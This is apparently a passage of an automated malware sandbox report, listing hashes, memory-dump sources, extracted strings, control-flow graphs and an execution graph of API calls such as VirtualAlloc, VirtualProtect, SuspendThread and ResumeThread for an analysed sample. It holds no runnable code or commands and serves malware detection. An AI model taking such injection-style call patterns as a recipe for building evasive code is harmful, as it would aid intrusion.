                                                          • Instruction Fuzzy Hash: C4E0EC10E1D6C29FE77A6B741895139BBE09F0B3D475509B9C14A8E2D3C95C28459B22
                                                          Function 00007FF84915EADB Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                          • Instruction ID: 5b0c19e58a30fabf3f72155920812b47e11141bbc145f90de761b17560caac21
                                                          • Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                          • Instruction Fuzzy Hash: 1CD0C954E0C5E3ADF139BE2140A827AD5916F013A0F66007ED47F418C1CD1CB8416E02
                                                          Function 00007FF849152ADB Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6e37bb2e79912a93e1139b8f8559d073a9279fd1bb46ae7a7ce609ffa7029cfa
                                                          • Instruction ID: fd09b2796cfc911c29c9221a85d34fe2da962e5acac95b5f517ec426bcf9223f
                                                          • Opcode Fuzzy Hash: 6e37bb2e79912a93e1139b8f8559d073a9279fd1bb46ae7a7ce609ffa7029cfa
                                                          • Instruction Fuzzy Hash: 7AD0C916A0C6C38DF27DBE11412063A91915F017A0F62083EC4AF41CD1CD1C74427A02

                                                          Non-executed Functions

                                                          Function 00007FF848BF0145 Relevance: 123.8, Strings: 97, Instructions: 2504COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $!$"$#$$$%$&$'$($)$*$+$,$-$.$/$0$1$2$3$4$5$6$7$8$9$:$;$<$=$>$?$@$A$B$C$D$E$F$G$H$I$J$K$L$M$N$O$P$Q$R$S$SG4b$T$U$V$V.$W$X$Y$Z$[$\$]$^$_$`$a$b$c$d$e$f$g$h$i$j$k$l$m$n$o$p$q$r$s$t$u$v$w$x$y$z${$|$}$~
                                                          • API String ID: 0-2199521338
                                                          • Opcode ID: 443f0bae6c892d39d1e6ad4a5830bb9378457802fc81d5aaff20594c29aacd5d
                                                          • Instruction ID: b92dfe2f402dbff2facc55c87a6a738a81fd59d92349df2027439ff8c13ddcc5
                                                          • Opcode Fuzzy Hash: 443f0bae6c892d39d1e6ad4a5830bb9378457802fc81d5aaff20594c29aacd5d
                                                          • Instruction Fuzzy Hash: 3E43DB70A155598FDBA8EB28C895BB9B3B1FF98300F4045E9D10EA72A1CF756E80CF45
                                                          Function 00007FF848C034FC Relevance: 19.1, Strings: 15, Instructions: 333COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DH$ FH$0DH$0FH$@DH$@FH$PDH$PEH$PFH$`DH$`EH$`FH$pDH$pEH$EH
                                                          • API String ID: 0-3590121244
                                                          • Opcode ID: 323fd90abde0ef846df9a5bcd9cfdaea21e1813e831a6dc85d14a4e7cf4a2c08
                                                          • Instruction ID: 26f60115f9a86ff5b4721ec5b1b21bb0019120363f9b9dac725e59b5e5aad082
                                                          • Opcode Fuzzy Hash: 323fd90abde0ef846df9a5bcd9cfdaea21e1813e831a6dc85d14a4e7cf4a2c08
                                                          • Instruction Fuzzy Hash: 30B1DA73D0EAC25FE356EBBC64560B57FA1FF437D8B5900FBD0888A0A7E62959058384
                                                          Function 00007FF848C03AFC Relevance: 12.7, Strings: 10, Instructions: 217COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (mH$(sH$(tH$(vH$8pH$PlH$PnH$pmH$psH$xH
                                                          • API String ID: 0-1988675727
                                                          • Opcode ID: 64119eb507d212c64eeac4dc58b9cc0434df163622f48492b609421520381337
                                                          • Instruction ID: 508402b1914ba750cdb6ab446df5f233838f43f3096a4e9dd085713cd263d186
                                                          • Opcode Fuzzy Hash: 64119eb507d212c64eeac4dc58b9cc0434df163622f48492b609421520381337
                                                          • Instruction Fuzzy Hash: CD71B627D0EAC29FE3959A7CA8060BA7F51FF537D4B1901FBD044CB0A7E73969058285
                                                          Function 00007FF848C038FA Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 1_^
                                                          • API String ID: 0-3667955127
                                                          • Opcode ID: b01ac1a4604ebdb86e8e154903b03f6fb1b9a5ab12ee79504959e877ccc9ee24
                                                          • Instruction ID: 6540381fde757846d67cb1796740d281cb4b2aaba33da5e867d0799fecb7ee44
                                                          • Opcode Fuzzy Hash: b01ac1a4604ebdb86e8e154903b03f6fb1b9a5ab12ee79504959e877ccc9ee24
                                                          • Instruction Fuzzy Hash: 4371C773D0E2926FE305FFBCA4A20F97B60DF433A8B1C01B7D5888D053DE19654A9295
                                                          Function 00007FF848BF55BD Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 1_^
                                                          • API String ID: 0-3204887481
                                                          • Opcode ID: 1bbfd2980ada6cf64d3da018291ffffeddbe88aba431303d814d14b2e5309840
                                                          • Instruction ID: 3704ef411fca530ba3117f283117e01bf6688ed8ea7ab12d165e508872911421
                                                          • Opcode Fuzzy Hash: 1bbfd2980ada6cf64d3da018291ffffeddbe88aba431303d814d14b2e5309840
                                                          • Instruction Fuzzy Hash: ED410972C0CBDB7EE305AE34949A0E17F50FF12694B1D00BBC985CA863CF19750A82A4
                                                          Function 00007FF848C04980 Relevance: .6, Instructions: 647COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9948ddf8d119dd8db7655180dfa51beefd7b993a1bf584babdf060852fc4a97e
                                                          • Instruction ID: 99bbe8c9bb662fe1ee5f394c640a3c19b2012b83e998cb1dfdcefb582b6367f7
                                                          • Opcode Fuzzy Hash: 9948ddf8d119dd8db7655180dfa51beefd7b993a1bf584babdf060852fc4a97e
                                                          • Instruction Fuzzy Hash: E2320B53D0F9C25FE39297B858261766E62BF536C8B4E00FBC1840759BB628AD19C34D
                                                          Function 00007FF848C031F2 Relevance: .4, Instructions: 353COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1e11fb40b13906ed06d091d7c35158fd493b24942e37407daedfd71f4aa3d147
                                                          • Instruction ID: 2a87a568c09db4cec0de5e95275e319be6f2a95c4343c0f92e9a87f287057a57
                                                          • Opcode Fuzzy Hash: 1e11fb40b13906ed06d091d7c35158fd493b24942e37407daedfd71f4aa3d147
                                                          • Instruction Fuzzy Hash: DBB1C67290E3A26FE341FB7CA4920F93F50DF433BCB1841B7D9888D0A3DE19654A9694
                                                          Function 00007FF848C04FF8 Relevance: .3, Instructions: 316COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f1c7f846c288f1a5689faedfa56ea991cc73f1875e897d782aba949996292b8f
                                                          • Instruction ID: e82cb59ddbe53a6c4b106872531c6fdf95779e886e626a62bdf7560038d350b6
                                                          • Opcode Fuzzy Hash: f1c7f846c288f1a5689faedfa56ea991cc73f1875e897d782aba949996292b8f
                                                          • Instruction Fuzzy Hash: 5EB11753E0E9C25FE393A2B864161F96E927F53AD4B5D00F7D1841B08FB628AD19C389
                                                          Function 00007FF848BFB94D Relevance: .1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3efe6bc936a63ba784451ce8ef8158e07ced708347c8a635295c9071222542d
                                                          • Instruction ID: b000705e7d955b80668aaeaa29e60239d34c840e537a01bf232b87805dbf146f
                                                          • Opcode Fuzzy Hash: d3efe6bc936a63ba784451ce8ef8158e07ced708347c8a635295c9071222542d
                                                          • Instruction Fuzzy Hash: E331F470D18A1D8FCF84EF58D491AEDBBF1FBA9300F20116AD419E3681CB35A941CB44
                                                          Function 00007FF84915787F Relevance: 29.1, Strings: 23, Instructions: 345COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: =#I$ ?#I$ @#I$0=#I$0?#I$0@#I$8>#I$@=#I$@?#I$@@#I$H>#I$P=#I$P@#I$X>#I$`=#I$`@#I$h>#I$p=#I$p@#I$x>#I$<#I$=#I$>#I
                                                          • API String ID: 0-3449052517
                                                          • Opcode ID: 96353f7034cddad6cdbd12a0ec4e03eea44a9cc1696065b5316e3c5fbcf75c06
                                                          • Instruction ID: 87364cdbd621a9216979c0074e9e8d619253b4b6c3f277c02be248f78d0757a1
                                                          • Opcode Fuzzy Hash: 96353f7034cddad6cdbd12a0ec4e03eea44a9cc1696065b5316e3c5fbcf75c06
                                                          • Instruction Fuzzy Hash: F9C1CCA2E0FDC38FF1B42D74280A13AB6B5BFA5A6078A49BAC144075DF953DDE054BC4
                                                          Function 00007FF849158E1C Relevance: 6.6, Strings: 5, Instructions: 400COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0#I$@#I$@#I$p#I$p#I
                                                          • API String ID: 0-2025207965
                                                          • Opcode ID: 3698534b82d3363ac1a615b70fd86ebc185665304702c2abd3dac82a7a0ee361
                                                          • Instruction ID: 6add8cef141edf0fab857624d8f92fd88347228fb21fac1b808e089b01c14ad3
                                                          • Opcode Fuzzy Hash: 3698534b82d3363ac1a615b70fd86ebc185665304702c2abd3dac82a7a0ee361
                                                          • Instruction Fuzzy Hash: 99E1E662D0EAD18FF7769A745818174FFA0BF166A0B5D04FEC0894B0DBD45D9D09CB82
                                                          Function 00007FF849158E20 Relevance: 6.6, Strings: 5, Instructions: 389COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0#I$@#I$@#I$p#I$p#I
                                                          • API String ID: 0-2025207965
                                                          • Opcode ID: e9e214ec92f62b8e5d8c6c2e60504c4d1c0a709a4ec16b364e0016ba6f2697d8
                                                          • Instruction ID: f7e19e6349f83413772eeb53f976f4bac373c478943c97c6154d5aec96ab4652
                                                          • Opcode Fuzzy Hash: e9e214ec92f62b8e5d8c6c2e60504c4d1c0a709a4ec16b364e0016ba6f2697d8
                                                          • Instruction Fuzzy Hash: 4EE1E462D0EAD18FF3B69A745819134FFA0BF166A0B5D04FEC0C94B09BD46D9D09CB82
                                                          Function 00007FF8491567F4 Relevance: 5.2, Strings: 4, Instructions: 225COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (b!I$Hc!I$pb!I$pb!I
                                                          • API String ID: 0-1379385363
                                                          • Opcode ID: 29284943919636c9065059339ff089889239ee3ef8690219b788d145b58cd5fc
                                                          • Instruction ID: 7855710e289f642bf94eff05691d4f6951f5f8a7e326bd6e11c5bbba90829e3f
                                                          • Opcode Fuzzy Hash: 29284943919636c9065059339ff089889239ee3ef8690219b788d145b58cd5fc
                                                          • Instruction Fuzzy Hash: E5710572D0F6D25FE321BEB864620F9BFA0EF123F8B0945BBC18C49087D819590697C4

                                                          Execution Graph

                                                          Execution Coverage:5.8%
                                                          Dynamic/Decrypted Code Coverage:55%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:20
                                                          Total number of Limit Nodes:1
                                                          execution_graph 49161 7ff848a63d8d 49163 7ff848a63d97 49161->49163 49162 7ff848a63d5d 49163->49162 49164 7ff848a63e6d VirtualAlloc 49163->49164 49165 7ff848a63ec5 49164->49165 49166 7ff848c009f5 49167 7ff848c00a0f GetFileAttributesW 49166->49167 49169 7ff848c00ad5 49167->49169 49157 7ff848a6239e 49158 7ff848a623ad VirtualProtect 49157->49158 49160 7ff848a624ed 49158->49160 49174 7ff848bfd35d 49175 7ff848bfd36b SuspendThread 49174->49175 49177 7ff848bfd444 49175->49177 49178 7ff848bfecd9 49179 7ff848bfece7 CloseHandle 49178->49179 49181 7ff848bfedc4 49179->49181 49170 7ff848bfeb78 49171 7ff848bfebb3 ResumeThread 49170->49171 49173 7ff848bfec84 49171->49173

                                                          Executed Functions

                                                          Function 00007FF848A6B5DD Relevance: 3.3, Strings: 1, Instructions: 2063COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 7ff848a6b5dd-7ff848a6b618 1 7ff848a6b61f-7ff848a6b67f 0->1 2 7ff848a6b61a 0->2 6 7ff848a6b68d-7ff848a6b69c 1->6 7 7ff848a6b681 1->7 2->1 8 7ff848a6b69e 6->8 9 7ff848a6b6a3-7ff848a6b6ac 6->9 7->6 8->9 10 7ff848a6b6ae-7ff848a6b6bd 9->10 11 7ff848a6b6d9-7ff848a6b734 9->11 12 7ff848a6b6bf 10->12 13 7ff848a6b6c4-7ff848a6d045 call 7ff848a6e266 10->13 23 7ff848a6b73b-7ff848a6b9d4 11->23 24 7ff848a6b736 11->24 12->13 20 7ff848a6d047-7ff848a6d04f call 7ff848a6e266 13->20 21 7ff848a6d050-7ff848a6d119 13->21 20->21 40 7ff848a6d11f-7ff848a6d21d 21->40 41 7ff848a6d226-7ff848a6d27e 21->41 148 7ff848a6c6be-7ff848a6c6cb 23->148 24->23 40->41 93 7ff848a6d21f 40->93 53 7ff848a6d284-7ff848a6d2cf 41->53 54 7ff848a6d415-7ff848a6d4f1 41->54 64 7ff848a6d3fc-7ff848a6d409 53->64 101 7ff848a6d4f7-7ff848a6d5d0 54->101 102 7ff848a6d5d2-7ff848a6d618 54->102 66 7ff848a6d40f-7ff848a6d410 64->66 67 7ff848a6d2d4-7ff848a6d2e2 64->67 68 7ff848a6d7cd-7ff848a6d804 66->68 70 7ff848a6d2e9-7ff848a6d369 67->70 71 7ff848a6d2e4 67->71 84 7ff848a6d806-7ff848a6d82c 68->84 85 7ff848a6d854-7ff848a6d86d 68->85 95 7ff848a6d36b 70->95 96 7ff848a6d370-7ff848a6d3ea 70->96 71->70 98 7ff848a6daf4-7ff848a6db21 84->98 90 7ff848a6d86f-7ff848a6d886 85->90 91 7ff848a6d88a-7ff848a6daf1 85->91 90->91 91->98 93->41 95->96 131 7ff848a6d3ec-7ff848a6d3f1 96->131 132 7ff848a6d3f4-7ff848a6d3f9 96->132 108 7ff848a6db27-7ff848a6db4b call 7ff848a6e2c9 98->108 109 7ff848a6d831-7ff848a6d84e 98->109 119 7ff848a6d61f-7ff848a6d625 101->119 102->119 128 7ff848a6db4d 108->128 129 7ff848a6db54-7ff848a6db88 108->129 109->85 122 7ff848a6d7ba-7ff848a6d7c7 119->122 122->68 126 7ff848a6d62a-7ff848a6d638 122->126 133 7ff848a6d63f-7ff848a6d6df 126->133 134 7ff848a6d63a 126->134 128->129 140 7ff848a6db8a-7ff848a6db97 129->140 141 7ff848a6dba8-7ff848a6dbc5 129->141 131->132 132->64 186 7ff848a6d74f-7ff848a6d777 133->186 187 7ff848a6d6e1-7ff848a6d709 133->187 134->133 145 7ff848a6db9e-7ff848a6dba6 140->145 146 7ff848a6db99 140->146 149 7ff848a6dbcb-7ff848a6dcc9 141->149 150 7ff848a6dd84-7ff848a6dd88 141->150 145->141 146->145 151 7ff848a6b9d9-7ff848a6b9e7 148->151 152 7ff848a6c6d1-7ff848a6c713 148->152 149->150 242 7ff848a6dccf-7ff848a6dcdb 149->242 155 7ff848a6dd8e-7ff848a6dd97 150->155 156 7ff848a6e097-7ff848a6e0ef 150->156 158 7ff848a6b9ee-7ff848a6bb42 151->158 159 7ff848a6b9e9 151->159 184 7ff848a6c7d0-7ff848a6c7d6 152->184 162 7ff848a6dd99-7ff848a6dd9e 155->162 163 7ff848a6dda1-7ff848a6ddaa 155->163 181 7ff848a6e257-7ff848a6e265 156->181 182 7ff848a6e0f5-7ff848a6e18a 156->182 266 7ff848a6bb8f-7ff848a6bba5 158->266 267 7ff848a6bb44-7ff848a6bb89 158->267 159->158 162->163 167 7ff848a6e081-7ff848a6e091 163->167 167->156 170 7ff848a6ddaf-7ff848a6ddc0 167->170 173 7ff848a6ddc7-7ff848a6de67 170->173 174 7ff848a6ddc2 170->174 230 7ff848a6de6d-7ff848a6decd 173->230 231 7ff848a6e073-7ff848a6e07b 173->231 174->173 182->181 241 7ff848a6e190-7ff848a6e1a1 182->241 192 7ff848a6c7dc-7ff848a6c81e 184->192 193 7ff848a6c718-7ff848a6c775 184->193 190 7ff848a6d77e-7ff848a6d7a7 186->190 191 7ff848a6d779 186->191 196 7ff848a6d70b 187->196 197 7ff848a6d710-7ff848a6d74d 187->197 213 7ff848a6d7b2-7ff848a6d7b7 190->213 191->190 220 7ff848a6ca6c-7ff848a6ca72 192->220 221 7ff848a6c777-7ff848a6c77b 193->221 222 7ff848a6c7a2-7ff848a6c7cd 193->222 196->197 197->213 213->122 224 7ff848a6ca78-7ff848a6cad1 220->224 225 7ff848a6c823-7ff848a6c864 220->225 221->222 228 7ff848a6c77d-7ff848a6c79f 221->228 222->184 244 7ff848a6cad7-7ff848a6cb23 224->244 245 7ff848a6cb60-7ff848a6cbb7 224->245 225->220 228->222 259 7ff848a6decf 230->259 260 7ff848a6ded4-7ff848a6dedd 230->260 231->167 246 7ff848a6e1a8-7ff848a6e255 241->246 247 7ff848a6e1a3 241->247 242->150 248 7ff848a6dce1-7ff848a6dd79 242->248 244->245 285 7ff848a6d017-7ff848a6d01d 245->285 246->181 247->246 248->150 259->260 264 7ff848a6e04c-7ff848a6e05a 260->264 265 7ff848a6dee3-7ff848a6df3b 260->265 269 7ff848a6e05c 264->269 270 7ff848a6e061-7ff848a6e069 264->270 291 7ff848a6dfc7-7ff848a6dff5 265->291 292 7ff848a6df41-7ff848a6df6d 265->292 266->148 267->266 269->270 278 7ff848a6e06b-7ff848a6e070 270->278 278->231 288 7ff848a6cbbc-7ff848a6cc5a 285->288 289 7ff848a6d023-7ff848a6d03b 285->289 306 7ff848a6cc5c-7ff848a6cc7f 288->306 307 7ff848a6cc8a-7ff848a6cc99 288->307 289->20 296 7ff848a6dffc-7ff848a6e04a 291->296 297 7ff848a6dff7 291->297 293 7ff848a6df6f 292->293 294 7ff848a6df74-7ff848a6dfc2 292->294 293->294 294->278 296->278 297->296 306->307 308 7ff848a6cc9b 307->308 309 7ff848a6cca0-7ff848a6ccaf 307->309 308->309 311 7ff848a6ccc4-7ff848a6ccdf 309->311 312 7ff848a6ccb1-7ff848a6ccbf 309->312 314 7ff848a6ccff-7ff848a6cfeb 311->314 315 7ff848a6cce1-7ff848a6ccfb 311->315 313 7ff848a6cff6-7ff848a6d014 312->313 313->285 314->313 315->314
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A6B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a6b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `J_H
                                                          • API String ID: 0-575383600
                                                          • Opcode ID: 6378f93f351895cc09fa3cf471f3eca5e82f8b312fa5133cd8b6ad95259d066c
                                                          • Instruction ID: c2e66f0943d83d814c6a73c76b3d11d477a54b2e0ef97b1d5601d59be9ba1f53
                                                          • Opcode Fuzzy Hash: 6378f93f351895cc09fa3cf471f3eca5e82f8b312fa5133cd8b6ad95259d066c
                                                          • Instruction Fuzzy Hash: A0031970D099198FDB98EF18C895BA9B7B1FF98340F1042E9C04DE3296CB75AA81CF55
                                                          Function 00007FF84915386F Relevance: .7, Instructions: 714COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849150000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a6e5da392164538af4b1382df770ea96b98c4003ca030b6b63f359bee0951e8c
                                                          • Instruction ID: ccb26704d096dee5bd8f63676ff70c1f507e80613dccb436b6eca018745ee293
                                                          • Opcode Fuzzy Hash: a6e5da392164538af4b1382df770ea96b98c4003ca030b6b63f359bee0951e8c
                                                          • Instruction Fuzzy Hash: 12529F3091C69A8FDB6DDF18C4906B8BBB1FF49350F9541BDD45AC7286CA38A982CF41
                                                          Function 00007FF848A9A00D Relevance: .5, Instructions: 501COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A9A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a9a000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e92210dd07a1dabb1fcde8e1eca30ba7f0271d1cf2627ff1b5581cba1d00254
                                                          • Instruction ID: 73a705916a80ee2dbd13e1a714da5356e79b6d892a709d5c1b3f77b135b7ac86
                                                          • Opcode Fuzzy Hash: 3e92210dd07a1dabb1fcde8e1eca30ba7f0271d1cf2627ff1b5581cba1d00254
                                                          • Instruction Fuzzy Hash: 10221670D086198FDB44DFA8C485AECFBF2FF48344F14866AD419AB245DB34A985CF64
                                                          Function 00007FF848A50DA0 Relevance: .3, Instructions: 296COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a50000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 91ac919e2d1a1fa5b4baf873e32ffcfbf2816a356b96b4d17b09bbc731b559ab
                                                          • Instruction ID: 2b1225d2000e5020e7838bd0a4e3925a06eea4f055f439fbfe390d2498145b0f
                                                          • Opcode Fuzzy Hash: 91ac919e2d1a1fa5b4baf873e32ffcfbf2816a356b96b4d17b09bbc731b559ab
                                                          • Instruction Fuzzy Hash: FAA1AA71D19A8A8FE798EF68D8667BDBBE2FF55340F40017AC009D3292CBB818418B51
                                                          Function 00007FF8493912D2 Relevance: 3.0, Strings: 2, Instructions: 521COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `<6I$`<6I
                                                          • API String ID: 0-803607174
                                                          • Opcode ID: 058addbdf940f525c7ebe69883ac08ee64fe7d759f53e713fb1df137e470e846
                                                          • Instruction ID: 4b4cda6a8f8a9f135bc195aab570bcc03c517f35a030f564d2dc7873181711c0
                                                          • Opcode Fuzzy Hash: 058addbdf940f525c7ebe69883ac08ee64fe7d759f53e713fb1df137e470e846
                                                          • Instruction Fuzzy Hash: 5B126670A1895D8FDFA8EF18D898FA977B1FB69345F1001A9D00EE7261DA35AD81CF40
                                                          Function 00007FF849166B88 Relevance: 2.6, Strings: 2, Instructions: 120COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: V*I$V*I
                                                          • API String ID: 0-684352607
                                                          • Opcode ID: b2c2648f1fd91d198394da882038f3d33d9f09a4323d18801fc73efe6dd22bfd
                                                          • Instruction ID: 54309256bb987e31ff032c28db36e07771d1d866a850ae59def99ee0f0568b92
                                                          • Opcode Fuzzy Hash: b2c2648f1fd91d198394da882038f3d33d9f09a4323d18801fc73efe6dd22bfd
                                                          • Instruction Fuzzy Hash: 6231E231E0D98A9FF76AAE2840596BA73A2FF94790F000439D00FC7285DE3C6C068F81
                                                          Function 00007FF8493901EF Relevance: 1.8, Strings: 1, Instructions: 523COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
